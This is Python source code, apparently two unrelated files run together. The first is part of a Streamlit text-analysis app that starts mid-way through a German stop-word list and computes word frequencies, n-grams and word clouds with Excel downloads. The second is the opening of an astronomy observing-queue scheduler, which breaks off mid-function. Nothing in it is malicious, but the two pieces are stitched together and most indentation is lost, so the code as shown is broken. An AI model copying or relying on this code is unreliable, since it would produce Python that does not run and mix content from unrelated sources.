er","gleichstes","gleichwohl","gleichzeitig","gleichzeitige","gleichzeitigem","gleichzeitigen","gleichzeitiger","gleichzeitiges","glücklicherweise","gluecklicherweise","gmbh","gott","gottseidank","gratulieren","gratuliert","gratulierte","groesstenteils","groß","gross","große","grosse","großen","grossen","großer","grosser","großes","grosses","grösstenteils","gruendlich","gründlich","gut","gute","guten","guter","gutes","h","hab","habe","haben","habt","haette","haeufig","haeufige","haeufigem","haeufigen","haeufiger","haeufigere","haeufigeren","haeufigerer","haeufigeres","halb","hallo","halten","hast","hat","hätt","hatte","hätte","hatten","hätten","hattest","hattet","häufig","häufige","häufigem","häufigen","häufiger","häufigere","häufigeren","häufigerer","häufigeres","heisst","hen","her","heraus","herein","herum","heute","heutige","heutigem","heutigen","heutiger","heutiges","hier","hierbei","hiermit","hiesige","hiesigem","hiesigen","hiesiger","hiesiges","hin","hindurch","hinein","hingegen","hinlanglich","hinlänglich","hinten","hintendran","hinter","hinterher","hinterm","hintern","hinunter","hoch","höchst","höchstens","http","hundert","i","ich","igitt","ihm","ihn","ihnen","ihr","ihre","ihrem","ihren","ihrer","ihres","ihretwegen","ihrige","ihrigen",
"ihriges","im","immer","immerhin","immerwaehrend","immerwaehrende","immerwaehrendem","immerwaehrenden","immerwaehrender","immerwaehrendes","immerwährend","immerwährende","immerwährendem","immerwährenden","immerwährender","immerwährendes","immerzu","important","in","indem","indessen","Inf.","info","infolge","infolgedessen","information","innen","innerhalb","innerlich","ins","insbesondere","insgeheim","insgeheime","insgeheimer","insgesamt","insgesamte","insgesamter","insofern","inzwischen","irgend","irgendein","irgendeine","irgendeinem","irgendeiner","irgendeines","irgendetwas","irgendjemand","irgendjemandem","irgendwann","irgendwas","irgendwelche","irgendwen","irgendwenn","irgendwer","irgendwie","irgendwo","irgendwohin","ist","j","ja","jaehrig","jaehrige","jaehrigem","jaehrigen","jaehriger","jaehriges","jahr","jahre","jahren","jährig","jährige","jährigem","jährigen","jähriges","je","jede","jedem","jeden","jedenfalls","jeder","jederlei","jedermann","jedermanns","jedes","jedesmal","jedoch","jeglichem","jeglichen","jeglicher","jegliches","jemals","jemand","jemandem","jemanden","jemandes","jene","jenem","jenen","jener","jenes","jenseitig","jenseitigem","jenseitiger","jenseits","jetzt","jung","junge","jungem","jungen","junger","junges","k","kaeumlich","kam","kann","kannst","kaum","käumlich","kein","keine","keinem","keinen","keiner","keinerlei","keines","keineswegs","klar","klare","klaren","klares","klein","kleine","kleinen","kleiner","kleines","koennen","koennt","koennte","koennten","koenntest","koenntet","komme","kommen","kommt","konkret","konkrete","konkreten","konkreter","konkretes","könn","können","könnt","konnte","könnte","konnten","könnten","konntest","könntest","konntet","könntet","kuenftig","kuerzlich","kuerzlichst","künftig","kurz","kürzlich","kürzlichst","l","laengst","lag","lagen","lang","lange","langsam","längst","längstens","lassen","laut","lediglich","leer","legen","legte","legten","leicht","leide","leider","lesen","letze","letzte","letzten","letztendlich","letztens","letztere","letzterem","letzterer","letzteres","letztes","letztlich","lichten","lieber","liegt","liest","links","los","m","mache","machen","machst","macht","machte","machten","mag","magst","mahn","mal","man","manch","manche","manchem","manchen","mancher","mancherlei","mancherorts","manches","manchmal","mann","margin","massgebend","massgebende","massgebendem","massgebenden","massgebender","massgebendes","massgeblich","massgebliche","massgeblichem","massgeblichen","massgeblicher","mehr","mehrere","mehrerer","mehrfach","mehrmalig","mehrmaligem","mehrmaliger","mehrmaliges","mein","meine","meinem","meinen","meiner","meines","meinetwegen","meins","meist","meiste","meisten","meistens","meistenteils","mensch","menschen","meta","mich","mindestens","mir","mit","miteinander","mitgleich","mithin","mitnichten","mittel","mittels","mittelst","mitten","mittig","mitunter","mitwohl","mochte","möchte","mochten","möchten","möchtest","moechte","moeglich","moeglichst","moeglichste","moeglichstem","moeglichsten","moeglichster","mögen","möglich","mögliche","möglichen","möglicher","möglicherweise","möglichst","möglichste","möglichstem","möglichsten","möglichster","mögt","morgen","morgige","muessen","muesst","muesste","muß","muss","müssen","mußt","musst","müßt","müsst","musste","müsste","mussten","müssten","n","na","nach","nachdem","nacher","nachher","nachhinein","nächste","nacht","naechste","naemlich","nahm","nämlich","naturgemaess","naturgemäss","natürlich","ncht","neben","nebenan","nehmen","nein","neu","neue","neuem","neuen","neuer","neuerdin
gs","neuerlich","neuerliche","neuerlichem","neuerlicher","neuerliches","neues","neulich","neun","neunte","neunten","neunter","neuntes","nicht","nichts","nichtsdestotrotz","nichtsdestoweniger","nie","niemals","niemand","niemandem","niemanden","niemandes","nimm","nimmer","nimmt","nirgends","nirgendwo","noch","noetigenfalls","nötigenfalls","nun","nur","nutzen","nutzt","nützt","nutzung","o","ob","oben","ober","oberen","oberer","oberhalb","oberste","obersten","oberster","obgleich","obs","obschon","obwohl","oder","oefter","oefters","off","offen","offenkundig","offenkundige","offenkundigem","offenkundigen","offenkundiger","offenkundiges","offensichtlich","offensichtliche","offensichtlichem","offensichtlichen","offensichtlicher","offensichtliches","oft","öfter","öfters","oftmals","ohne","ohnedies","online","ordnung","p","paar","partout","per","persoenlich","persoenliche","persoenlichem","persoenlicher","persoenliches","persönlich","persönliche","persönlicher","persönliches","pfui","ploetzlich","ploetzliche","ploetzlichem","ploetzlicher","ploetzliches","plötzlich","plötzliche","plötzlichem","plötzlicher","plötzliches","pro","q","quasi","r","reagiere","reagieren","reagiert","reagierte","recht","rechte","rechten","rechter","rechtes","rechts","regelmäßig","reichlich","reichliche","reichlichem","reichlichen","reichlicher","restlos","restlose","restlosem","restlosen","restloser","restloses","richtig","richtiggehend","richtiggehende","richtiggehendem","richtiggehenden","richtiggehender","richtiggehendes","rief","rund","rundheraus","rundum","runter","s","sa","sache","sage","sagen","sagt","sagte","sagten","sagtest","sagtet","sah","samt","sämtliche","sang","sangen","satt","sattsam","schätzen","schätzt","schätzte","schätzten","scheinbar","scheinen","schlecht","schlechter","schlicht","schlichtweg","schließlich","schluss","schlussendlich","schnell","schon","schreibe","schreiben","schreibens","schreiber","schwerlich","schwerliche","schwerlichem","schwerlichen","schwerlicher","schwerliches","schwierig","sechs","sechste","sechsten","sechster","sechstes","sect","sehe","sehen","sehr","sehrwohl","seht","sei","seid","seien","seiest","seiet","sein","seine","seinem","seinen","seiner","seines","seit","seitdem","seite","seiten","seither","selbe","selben","selber","selbst","selbstredend","selbstredende","selbstredendem","selbstredenden","selbstredender","selbstredendes","seltsamerweise","senke","senken","senkt","senkte","senkten","setzen","setzt","setzte","setzten","sich","sicher","sicherlich","sie","sieben","siebente","siebenten","siebenter","siebentes","siebte","siehe","sieht","sind","singen","singt","so","sobald","sodaß","soeben","sofern","sofort","sog","sogar","sogleich","solang","solange","solc","solchen","solch","solche","solchem","solchen","solcher","solches","soll","sollen","sollst","sollt","sollte","sollten","solltest","solltet","somit","sondern","sonst","sonstig","sonstige","sonstigem","sonstiger","sonstwo","sooft","soviel","soweit","sowie","sowieso","sowohl","später","spielen","startet","startete","starteten","startseite","statt","stattdessen","steht","steige","steigen","steigt","stellenweise","stellenweisem","stellenweisen","stets","stieg","stiegen","such","suche","suchen","t","tag","tage","tagen","tages","tat","tät","tatsächlich","tatsächlichen","tatsächlicher","tatsächliches","tatsaechlich","tatsaechlichen","tatsaechlicher","tatsaechliches","tausend","teil","teile","teilen","teilte","teilten","tel","tief","titel","toll","total","trage","tragen","trägt","tritt","trotzdem","trug","tun","tust","tut","txt","u","ü
bel","über","überall","überallhin","überaus","überdies","überhaupt","überll","übermorgen","üblicherweise","übrig","übrigens","ueber","ueberall","ueberallhin","ueberaus","ueberdies","ueberhaupt","uebermorgen","ueblicherweise","uebrig","uebrigens","uhr","um","ums","umso","umstaendehalber","umständehalber","unbedingt","unbedingte","unbedingter","unbedingtes","und","unerhoert","unerhoerte","unerhoertem","unerhoerten","unerhoerter","unerhoertes","unerhört","unerhörte","unerhörtem","unerhörten","unerhörter","unerhörtes","ungefähr","ungemein","ungewoehnlich","ungewoehnliche","ungewoehnlichem","ungewoehnlichen","ungewoehnlicher","ungewoehnliches","ungewöhnlich","ungewöhnliche","ungewöhnlichem","ungewöhnlichen","ungewöhnlicher","ungewöhnliches","ungleich","ungleiche","ungleichem","ungleichen","ungleicher","ungleiches","unmassgeblich","unmassgebliche","unmassgeblichem","unmassgeblichen","unmassgeblicher","unmassgebliches","unmoeglich","unmoegliche","unmoeglichem","unmoeglichen","unmoeglicher","unmoegliches","unmöglich","unmögliche","unmöglichen","unmöglicher","unnötig","uns","unsaeglich","unsaegliche","unsaeglichem","unsaeglichen","unsaeglicher","unsaegliches","unsagbar","unsagbare","unsagbarem","unsagbaren","unsagbarer","unsagbares","unsäglich","unsägliche","unsäglichem","unsäglichen","unsäglicher","unsägliches","unse","unsem","unsen","unser","unsere","unserem","unseren","unserer","unseres","unserm","unses","unsre","unsrem","unsren","unsrer","unsres","unstreitig","unstreitige","unstreitigem","unstreitigen","unstreitiger","unstreitiges","unten","unter","unterbrach","unterbrechen","untere","unterem","unteres","unterhalb","unterste","unterster","unterstes","unwichtig","unzweifelhaft","unzweifelhafte","unzweifelhaftem","unzweifelhaften","unzweifelhafter","unzweifelhaftes","usw","usw.","v","vergangen","vergangene","vergangenen","vergangener","vergangenes","vermag","vermögen","vermutlich","vermutliche","vermutlichem","vermutlichen","vermutlicher","vermutliches","veröffentlichen","veröffentlicher","veröffentlicht","veröffentlichte","veröffentlichten","veröffentlichtes","verrate","verraten","verriet","verrieten","version","versorge","versorgen","versorgt","versorgte","versorgten","versorgtes","viel","viele","vielem","vielen","vieler","vielerlei","vieles","vielleicht","vielmalig","vielmals","vier","vierte","vierten","vierter","viertes","voellig","voellige","voelligem","voelligen","voelliger","voelliges","voelligst","vollends","völlig","völlige","völligem","völligen","völliger","völliges","völligst","vollstaendig","vollstaendige","vollstaendigem","vollstaendigen","vollstaendiger","vollstaendiges","vollständig","vollständige","vollständigem","vollständigen","vollständiger","vollständiges","vom","von","vor","voran","vorbei","vorgestern","vorher","vorherig","vorherige","vorherigem","vorheriger",
"vorne","vorüber","vorueber","w","wachen","waehrend","waehrenddessen","waere","während","währenddem","währenddessen","wann","war","wär","wäre","waren","wären","warst","wart","warum","was","weder","weg","wegen","weil","weiß","weit","weiter","weitere","weiterem","weiteren","weiterer","weiteres","weiterhin","weitestgehend","weitestgehende","weitestgehendem","weitestgehenden","weitestgehender","weitestgehendes","weitgehend","weitgehende","weitgehendem","weitgehenden","weitgehender","weitgehendes","welche","welchem","welchen","welcher","welches","wem","wen","wenig","wenige","weniger","weniges","wenigstens","wenn","wenngleich","wer","werde","werden","werdet","weshalb","wessen","weswegen","wichtig","wie","wieder","wiederum","wieso","wieviel","wieviele","wievieler","wiewohl","will","willst","wir","wird","wirklich","wirklichem","wirklicher","wirkliches","wirst","wissen","wo","wobei","wodurch","wofuer","wofür","wogegen","woher","wohin","wohingegen","wohl","wohlgemerkt","wohlweislich","wolle","wollen","wollt","wollte","wollten","wolltest","wolltet","womit","womoeglich","womoegliche","womoeglichem","womoeglichen","womoeglicher","womoegliches","womöglich","womögliche","womöglichem","womöglichen","womöglicher","womögliches","woran","woraufhin","woraus","worden","worin","wuerde","wuerden","wuerdest","wuerdet","wurde","würde","wurden","würden","wurdest","würdest","wurdet","würdet","www","x","y","z","z.b","z.B.","zahlreich","zahlreichem","zahlreicher","zB","zb.","zehn","zehnte","zehnten","zehnter","zehntes","zeit","zeitweise","zeitweisem","zeitweisen","zeitweiser","ziehen","zieht","ziemlich","ziemliche","ziemlichem","ziemlichen","ziemlicher","ziemliches","zirka","zog","zogen","zu","zudem","zuerst","zufolge","zugleich","zuletzt","zum","zumal","zumeist","zumindest","zunächst","zunaechst","zur","zurück","zurueck","zusammen","zusehends","zuviel","zuviele","zuvieler","zuweilen","zwanzig","zwar","zwei","zweifelsfrei","zweifelsfreie","zweifelsfreiem","zweifelsfreien","zweifelsfreier","zweifelsfreies","zweite","zweiten","zweiter","zweites","zwischen","zwölf"]
elif stopword_selection=="Use a built-in list of stop words in English":
word_stopwords=['a','about','above','after','again','against','ain','all','am','an','and','any','are','aren',"aren't",'as','at','be','because','been','before','being','below','between','both','but','by','can','couldn',"couldn't",'d','did','didn',"didn't",'do','does','doesn',"doesn't",'doing','don',"don't",'down','during','each','few','for','from','further','had','hadn',"hadn't",'has','hasn',"hasn't",'have','haven',"haven't",'having','he','her','here','hers','herself','him','himself','his','how','i','if','in','into','is','isn',"isn't",'it',"it's",'its','itself','just','ll','m','ma','me','mightn',"mightn't",'more','most','mustn',"mustn't",'my','myself','needn',"needn't",'no','nor','not','now','o','of','off','on','once','only','or','other','our','ours','ourselves','out','over','own','re','s','same','shan',"shan't",'she',"she's",'should',"should've",'shouldn',"shouldn't",'so','some','such','t','than','that',"that'll",'the','their','theirs','them','themselves','then','there','these','they','this','those','through','to','too','under','until','up','ve','very','was','wasn',"wasn't",'we','were','weren',"weren't",'what','when','where','which','while','who','whom','why','will','with','won',"won't",'wouldn',"wouldn't",'y','you',"you'd","you'll","you're","you've",'your','yours','yourself','yourselves']
elif stopword_selection=="Specify stop words":
word_stopwords=[]
user_stopwords=st.text_area('Please enter or copy stop words here', value='', height=200, key = session_state.id )
if len(user_stopwords)>0:
stopwords_cv = CountVectorizer()
stopwords_cv_fit=stopwords_cv.fit_transform([user_stopwords])
word_stopwords=stopwords_cv.get_feature_names()
st.write("")
a4,a5=st.beta_columns(2)
with a4:
# user specification of words to search
word_list=pd.DataFrame(columns=word_sorted.index)
#words_cleaned=word_list.drop(word_stopwords,axis=1)
words_cleaned=sorted(list(set(word_list)-set(word_stopwords)))
find_words=st.multiselect("Search sentences with following words",
words_cleaned, key = session_state.id)
with a5:
#user-specification of n-grams
user_ngram=st.number_input("Specify the number of words to be extracted (n-grams)", min_value=1, value=2, key = session_state.id)
if st.checkbox('Show a word count', value = False, key = session_state.id):
st.write(word_sorted)
st.write("")
number_remove=st.checkbox("Remove numbers from text", value=True, key = session_state.id)
a4,a5=st.beta_columns(2)
with a4:
#WordCloud color specification
st.write("")
draw_WordCloud=st.checkbox("Create a Word Cloud", value=True, key = session_state.id)
with a5:
if draw_WordCloud==True:
#color options for the WordCloud (user selection)
color_options= pd.DataFrame(np.array([[21, 120, 12, 240, 30]]),
columns=['orange', 'green', 'red','blue','brown'])
user_color_name=st.selectbox('Select the main color of your WordCloud',color_options.columns, key = session_state.id)
user_color=color_options[user_color_name]
st.write("")
st.write("")
run_text = st.button("Press to start text processing...")
if run_text:
st.write("")
st.write("")
st.info("Text processing progress")
text_bar = st.progress(0.0)
progress = 0
#---------------------------------------------------------------------------------
# Basic NLP metrics and visualisations
#---------------------------------------------------------------------------------
wfreq_output = st.beta_expander("Basic NLP metrics and visualisations ", expanded = False)
with wfreq_output:
# Word frequency
st.subheader('Word count')
                        #calculate word frequency - stop words excluded:
word_sorted=fc.cv_text(user_text, word_stopwords, 1,user_precision,number_remove)
st.write("")
st.write("Number of words: ", word_sorted["Word count"].sum())
st.write("Number of sentences", len(re.findall(r"([^.]*\.)" ,user_text)))
if len(word_stopwords)>0:
st.warning("All analyses are based on text with stop words removed!")
else:
st.warning("No stop words are removed from the text!")
st.write(word_sorted.style.format({"Rel. freq.": "{:.2f}"}))
a4,a5=st.beta_columns(2)
with a4:
# relative frequency for the top 10 words
txt_bar=word_sorted.head(min(len(word_sorted),10))
fig = go.Figure()
fig.add_trace(go.Bar(x=txt_bar["Rel. freq."], y=txt_bar.index, name='',marker_color = 'indianred',opacity=0.5,orientation='h'))
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title='relative fraction %', titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white",align="left"))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig, use_container_width=True)
st.info("Top " + str(min(len(word_sorted),10)) + " words relative frequency")
with a5:
fig = go.Figure(data=[go.Histogram(x=word_sorted["Word length"], histnorm='probability',marker_color ='steelblue',opacity=0.5)])
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title='word length', titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white",align="left"))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig, use_container_width=True)
st.info("Word length distribution")
#word similarity vs. word length & word frequency
word_similarity=[]
for word in txt_bar.index:
d=0
for sword in txt_bar.index:
seq = SequenceMatcher(None,word,sword)
d = d+(seq.ratio()*100)
word_similarity.append([d])
txt_bar["Similarity"]=(np.float_(word_similarity)/len(txt_bar.index)).round(user_precision)
a4,a5=st.beta_columns(2)
with a4:
# bubble chart
fig = go.Figure(data=[go.Scatter(
y=txt_bar.index, x=txt_bar["Rel. freq."], mode='markers',text=txt_bar["Similarity"],
marker_size=txt_bar["Similarity"],marker_color='indianred') ])
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title='relative frequency', titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white",align="left"))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig, use_container_width=True)
st.info("Bubble size eq. average word similarity across the top " + str(min(len(word_sorted),10)) +" words")
with a5:
df_to_plot=word_sorted
df_to_plot['word']=word_sorted.index
fig = px.scatter(data_frame=df_to_plot, x='Word length', y='Rel. freq.',hover_data=['word','Word length', 'Rel. freq.'], color_discrete_sequence=['steelblue'])
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title="word length", titlefont_size=14, tickfont_size=14,),)
fig.update_layout(yaxis=dict(title="word frequency", titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white", ))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig)
st.info("A comparision of frequencies of short and long words")
# bigram distribution
cv2_output=fc.cv_text(user_text, word_stopwords, 2,user_precision,number_remove)
# trigram distribution
cv3_output=fc.cv_text(user_text, word_stopwords, 3,user_precision,number_remove)
a4,a5=st.beta_columns(2)
with a4:
txt_bar=cv2_output.head(min(len(cv2_output),10))
fig = go.Figure()
fig.add_trace(go.Bar(x=txt_bar["Rel. freq."], y=txt_bar.index, name='',marker_color = 'indianred',opacity=0.5,orientation='h'))
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title='relative fraction %', titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white",align="left"))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig, use_container_width=True)
st.info("Top " + str(min(len(cv2_output),10)) + " bigrams relative frequency")
with a5:
txt_bar=cv3_output.head(10)
fig = go.Figure()
fig.add_trace(go.Bar(x=txt_bar["Rel. freq."], y=txt_bar.index, name='',marker_color = 'indianred',opacity=0.5,orientation='h'))
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title='relative fraction %', titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white",align="left"))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig, use_container_width=True)
st.info("Top " + str(min(len(cv2_output),10)) + " trigrams relative frequency")
if draw_WordCloud==True:
#Draw WordCloud
wordcloud = WordCloud(background_color="white",
contour_color="white",max_words=100,stopwords=word_stopwords,
width=600,height=400,color_func=random_color_func).generate(user_text)
fig_text, ax = plt.subplots()
ax=plt.imshow(wordcloud, interpolation='bilinear')
plt.axis("off")
st.subheader('WordCloud')
st.pyplot(fig_text)
progress += 1
text_bar.progress(progress/3)
# Download link
st.write("")
output = BytesIO()
excel_file = pd.ExcelWriter(output, engine="xlsxwriter")
word_sorted.to_excel(excel_file, sheet_name="words",index=False)
if len(word_stopwords)>0:
pd.DataFrame(word_stopwords,columns=['stop words']).to_excel(excel_file, sheet_name="stop words",index=False)
if len(cv2_output)>0:
cv2_output.to_excel(excel_file, sheet_name="bigrams",index=True)
if len(cv3_output)>0:
cv3_output.to_excel(excel_file, sheet_name="trigrams",index=True)
excel_file.save()
excel_file = output.getvalue()
b64 = base64.b64encode(excel_file)
dl_file_name = "BasicTextAnalysis.xlsx"
st.markdown(
f"""
<a href="data:file/excel_file;base64,{b64.decode()}" id="button_dl" download="{dl_file_name}">Download basic NLP metrics</a>
""",
unsafe_allow_html=True)
st.write("")
#---------------------------------------------------------------------------------
# Sentences with specific words
#---------------------------------------------------------------------------------
if len(find_words)>0:
# extract all sentences with specific words:
sentences_list=[]
sentences = re.findall(r"([^.]*\.)" ,user_text)
for sentence in sentences:
if all(word in sentence for word in find_words):
                                if len(sentence)<1000: # threshold for too-long sentences is 1000 characters
sentences_list.append(sentence)
if len(sentences_list)>0:
sentences_output = st.beta_expander("Sentences with specific words", expanded = False)
with sentences_output:
for sentence in sentences_list:
st.write(sentence)
#st.table(pd.DataFrame({'Sentences':sentences_list}))
# Download link
st.write("")
output = BytesIO()
excel_file = pd.ExcelWriter(output, engine="xlsxwriter")
pd.DataFrame({'Sentences':sentences_list}).to_excel(excel_file, sheet_name="Sentences",index=False)
excel_file.save()
excel_file = output.getvalue()
b64 = base64.b64encode(excel_file)
dl_file_name = "Sentences with specific words.xlsx"
st.markdown(
f"""
<a href="data:file/excel_file;base64,{b64.decode()}" id="button_dl" download="{dl_file_name}">Download sentences</a>
""",
unsafe_allow_html=True)
st.write("")
progress += 1
text_bar.progress(progress/3)
#---------------------------------------------------------------------------------
# User specific n-grams
#---------------------------------------------------------------------------------
#extract n-grams:
ngram_list=[]
text_cv = fc.cv_text(user_text, word_stopwords,user_ngram,user_precision,number_remove)
#CountVectorizer(analyzer='word', stop_words=set(word_stopwords), ngram_range=(user_ngram, user_ngram))
#text_cv_fit=text_cv.fit_transform([user_text])
#listToString='. '.join(text_cv.get_feature_names())
listToString='. '.join(text_cv.index)
sentences = re.findall(r"([^.]*\.)" ,listToString)
for sentence in sentences:
if all(word in sentence for word in find_words):
sentence=re.sub('[.]', '', sentence)
ngram_list.append(sentence)
if len(ngram_list)>0:
ngram_output = st.beta_expander("n-grams", expanded = False)
with ngram_output:
st.write("")
st.subheader("n-grams")
st.write("")
for sentence in ngram_list:
st.write(sentence)
# Download link
st.write("")
output = BytesIO()
excel_file = pd.ExcelWriter(output, engine="xlsxwriter")
pd.DataFrame({'n-gram':ngram_list}).to_excel(excel_file, sheet_name=str(user_ngram) +"-gram",index=False)
excel_file.save()
excel_file = output.getvalue()
b64 = base64.b64encode(excel_file)
dl_file_name = str(user_ngram)+"gram.xlsx"
st.markdown(
f"""
<a href="data:file/excel_file;base64,{b64.decode()}" id="button_dl" download="{dl_file_name}">Download n-grams</a>
""",
unsafe_allow_html=True)
st.write("")
progress += 1
text_bar.progress(progress/3)
# Success message
#st.success('Text processing completed')
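#----------------------------------------------------------------------------------------------
# Rough sketch (assumption only, not the real functions.py implementation): the interface this
# app expects from fc.cv_text, inferred from how it is used above. It should return a DataFrame
# indexed by n-grams with "Word count", "Rel. freq." (in %) and "Word length" columns, sorted
# by count in descending order.
def _cv_text_sketch(text, stopwords, ngram, precision, remove_numbers):
    if remove_numbers:
        text = re.sub(r"\d+", "", text)
    cv = CountVectorizer(stop_words=stopwords if stopwords else None,
                         ngram_range=(ngram, ngram))
    counts = cv.fit_transform([text]).toarray().sum(axis=0)
    out = pd.DataFrame({"Word count": counts}, index=cv.get_feature_names())
    out["Rel. freq."] = (100 * out["Word count"] / out["Word count"].sum()).round(precision)
    out["Word length"] = [len(w) for w in out.index]
    return out.sort_values(by="Word count", ascending=False)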
|
"""Queue classes."""
import os
from collections import defaultdict
from datetime import datetime
import logging
import numpy as np
import pandas as pd
import astropy.coordinates as coord
import astropy.units as u
from astropy.time import Time, TimeDelta
import astroplan
from .Fields import Fields
from .optimize import tsp_optimize, night_optimize
from .cadence import enough_gap_since_last_obs
from .constants import P48_loc, PROGRAM_IDS, FILTER_IDS, TIME_BLOCK_SIZE
from .constants import EXPOSURE_TIME, READOUT_TIME, FILTER_CHANGE_TIME, slew_time
from .constants import PROGRAM_BLOCK_SEQUENCE, LEN_BLOCK_SEQUENCE, MAX_AIRMASS
from .constants import BASE_DIR
from .utils import approx_hours_of_darkness
from .utils import skycoord_to_altaz, seeing_at_pointing
from .utils import altitude_to_airmass, airmass_to_altitude, RA_to_HA, HA_to_RA
from .utils import scalar_len, nightly_blocks, block_index, block_index_to_time
from .utils import block_use_fraction, maximum_altitude, compute_limiting_mag
class QueueEmptyError(Exception):
"""Error class for when the nightly queue has no more fields"""
pass
class QueueManager(object):
def __init__(self, queue_name, queue_configuration, rp=None, fields=None):
self.logger = logging.getLogger(__name__)
# queue name (useful in Scheduler object when swapping queues)
self.queue_name = queue_name
# list of ObservingPrograms
self.observing_programs = queue_configuration.build_observing_programs()
# defaults to handle time-windowed queues
self.is_TOO = False
self.validity_window = None
# Hack for greedy queues
self.requests_in_window = True
if 'validity_window_mjd' in queue_configuration.config:
window = queue_configuration.config['validity_window_mjd']
if window is not None:
assert(len(window) == 2)
self.set_validity_window_mjd(window[0], window[1])
else:
self.validity_window = None
else:
self.validity_window = None
# flag to check if assign_nightly_requests has been called tonight
self.queue_night = None
# block on which the queue parameters were calculated
self.queue_slot = None
        # number of allowed requests by subprogram tonight
# (dict of (program_id, subprogram_name))
self.requests_allowed = {}
# the queue itself
self.queue = pd.DataFrame()
# should we only consider fields from one program in a given
# observing block?
# CURRENTLY NOT IMPLEMENTED.
self.block_programs = False
if rp is None:
# initialize an empty RequestPool
self.rp = RequestPool()
else:
self.rp = rp
if fields is None:
self.fields = Fields()
else:
self.fields = fields
self.missed_obs_queue = None
def is_valid(self, time):
if self.validity_window is None:
return True
window_start = self.validity_window[0]
window_stop = self.validity_window[1]
return window_start <= time <= window_stop
def validity_window_mjd(self):
if self.validity_window is None:
return None
return [self.validity_window[0].mjd, self.validity_window[1].mjd]
def set_validity_window_mjd(self, window_start, window_stop):
"""Set the time at which this queue can run.
Parameters
----------
window_start : `float`
Modified Julian Date start time
window_stop : `float`
Modified Julian Date end time
"""
if window_start >= window_stop:
raise ValueError("validity window start time must be less than end time")
# rough sanity checks
if window_start <= Time('2017-01-01').mjd:
raise ValueError(f"MJD likely out of range: {window_start}")
if window_stop >= Time('2030-01-01').mjd:
raise ValueError(f"MJD likely out of range: {window_stop}")
self.validity_window = [Time(window_start,format='mjd'),
Time(window_stop,format='mjd')]
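    # Usage sketch (hypothetical MJD values): restrict this queue to a
    # roughly 2.4-hour window on a given night, e.g.
    #   queue.set_validity_window_mjd(58850.15, 58850.25)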
def compute_block_use(self):
"""Returns a dictionary with the fraction of blocks used by the queue,
assuming observing starts at the beginning of the validity window"""
if self.validity_window is None:
raise ValueError('All blocks are valid')
start_block = block_index(self.validity_window[0])
obs_start_time = Time(self.validity_window[0],format='mjd')
# greedy queues have no len until they have assignments made, so
# just use the validity window
if len(self.queue) == 0:
stop_block = block_index(self.validity_window[1])
obs_end_time = self.validity_window[1]
else:
# with no weather, we start at the start of the window
if 'n_repeats' in self.queue.columns:
n_obs = np.sum(self.queue.n_repeats)
exp_time = np.sum(self.queue.exposure_time * self.queue.n_repeats)
else:
n_obs = len(self.queue)
exp_time = np.sum(self.queue.exposure_time)
obs_time = (exp_time * u.second) + n_obs * READOUT_TIME
obs_end_time = self.validity_window[0] + obs_time
stop_block = block_index(obs_end_time)
# below breaks if the window is longer than the observations
#stop_block = block_index(self.validity_window[1])
assert obs_end_time > obs_start_time
# compute fraction of the blocks used by the queue
block_use = defaultdict(float)
for block in np.arange(start_block, stop_block+1):
block_use[block] = block_use_fraction(block, obs_start_time,
obs_end_time)
return block_use
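    # Note: compute_block_use returns {block_index: fraction of that time
    # block occupied by this queue}, as computed by block_use_fraction.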
def add_observing_program(self, observing_program):
self.observing_programs.append(observing_program)
def assign_nightly_requests(self, current_state, obs_log,
time_limit = 30 * u.second, block_use = defaultdict(float),
timed_obs_count = defaultdict(int)):
# clear previous request pool
if self.queue_name != 'missed_obs':
self.rp.clear_all_request_sets()
# set number of allowed requests by program.
self.determine_allowed_requests(current_state['current_time'],
obs_log, timed_obs_count = timed_obs_count)
# can be used by field_selection_functions downstream
program_fields = {}
for program in self.observing_programs:
key = (program.program_id, program.subprogram_name)
program_fields[key] = \
{'field_ids': program.field_ids,
'field_selection_function': program.field_selection_function,
'requests_allowed': self.requests_allowed[key]}
for program in self.observing_programs:
request_sets = program.assign_nightly_requests(
current_state['current_time'], self.fields,
obs_log, program_fields, block_programs=self.block_programs)
for rs in request_sets:
self.rp.add_request_sets(rs['program_id'],
rs['subprogram_name'], rs['program_pi'],
rs['field_ids'], rs['filter_ids'],
rs['intranight_gap'],
rs['exposure_time'],
rs['total_requests_tonight'])
# assert(len(self.rp.pool) > 0)
# now do any queue-type-specific setup (implemented by subclasses)
self._assign_nightly_requests(current_state,
time_limit = time_limit, block_use = block_use)
# mark that we've set up the pool for tonight
self.queue_night = np.floor(current_state['current_time'].mjd)
def adjust_program_exposures_tonight(self, obs_log, mjd_start, mjd_stop):
"""Use past history to adjust the number of exposures per program tonight.
Counts exposures from the start of the month and spreads any excess
over NIGHTS_TO_REDISTRIBUTE nights or the number of nights remaining
in the month, whichever is fewer."""
obs_count_by_program = obs_log.count_equivalent_obs_by_program(
mjd_range = [mjd_start, mjd_stop])
# drop engineering/commissioning
obs_count_by_program = obs_count_by_program[
obs_count_by_program['program_id'] != 0]
obs_count_by_program.set_index('program_id', inplace=True)
# if there are no observations, add zeros
for program_id in PROGRAM_IDS:
if program_id != 0:
if program_id not in obs_count_by_program.index:
obs_count_by_program.loc[program_id] = 0
total_obs = np.sum(obs_count_by_program['n_obs'])
# infer the program fractions from the subprograms
